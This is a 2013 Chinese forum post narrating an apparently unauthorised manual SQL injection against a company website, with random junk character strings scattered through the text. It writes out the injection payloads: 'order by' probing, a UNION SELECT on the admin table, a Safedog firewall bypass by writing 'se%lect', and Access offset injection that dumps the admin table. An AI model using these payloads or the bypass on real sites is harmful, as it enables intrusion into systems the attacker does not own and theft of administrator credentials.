找回密码
 立即注册
查看: 2934|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
# O5 p6 F4 n. j6 [) \7 x& G2 i5 c: n5 V2 X7 H( S. f3 r
; @# x" @' p  i' L, i7 }) E
顺手加个admin; M. Q: F% S8 I# @! k
6 j; N2 g8 G1 ~8 U! p$ }' K8 f! c  X
- v) @6 i) E( C! n  p! V* X5 I# l3 h
默认后台。
' I6 _  A( r% N" {5 u% {回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
( a. i4 @" @9 D  h8 G  [: e: S" a: ^% E6 k$ |: V( K

) O( b- e7 c; H2 A9 O' h& D9 n1 C' X5 N
$ G0 t; ?8 ^6 n2 z. r+ a* C所以就不用御剑扫了,待会直接封IP。9 F) O& [! t9 [

( y5 J( n9 x+ ]: u$ l1 Z用order by语句判断是否存在注入。$ }' J9 v' E2 C. @
http://www.xxx.com /product_show.asp?id=997 order by 1
2 v( _% d- O  E+ \/ T) e5 ^http://www.xxx.com /product_show.asp?id=997 order by 1001 f0 m0 w" N' z. e* ^/ w+ D
现在存在注入,经测试后发现是9个字段。
+ i$ n1 G5 Y" j% l8 j/ y8 m* ?
( t& A) Q* s' T& b! K9 C接下来进行联合查询,猜是否存在admin表。3 C# b# U( M$ Y; _' ]( c1 {
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
0 H& Q9 z" {% q& x7 U0 l$ q
1 F. A  k$ g/ u" {% e
- V1 h) u# ~5 p4 b& }8 ~6 P. R9 P. \1 k
在select中间加个%,se%lect绕过安全狗。
; x. v7 R; x& \# S$ r+ r, k9 Q3 S* k& B. y! r
' {' t6 O5 L+ |" o/ ?$ n- ]
发现存在admin表,然后开始手工猜常用的字段。
; ]4 i" D- Y  V2 E9 B1 w纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
/ t' |" U5 N: l  ?; e  M# ? 5 A. M- W# C3 _* G- d4 \$ A: _, D
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
) t  X) |* b. M& {+ m 9 ~2 y. g6 q4 Y& ~4 ^
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。( c7 ?% j, n2 w+ z1 `$ ]
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin+ n. q/ {" G; [" E0 q5 u
好了,敏感内容出显了。​
2 G' B1 O) i- ?2 a
* ^  O- S, |) R2 G  o" Q3 z  ^# |9 ~, o3 v; e( W

. X" K5 g6 d- J9 P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表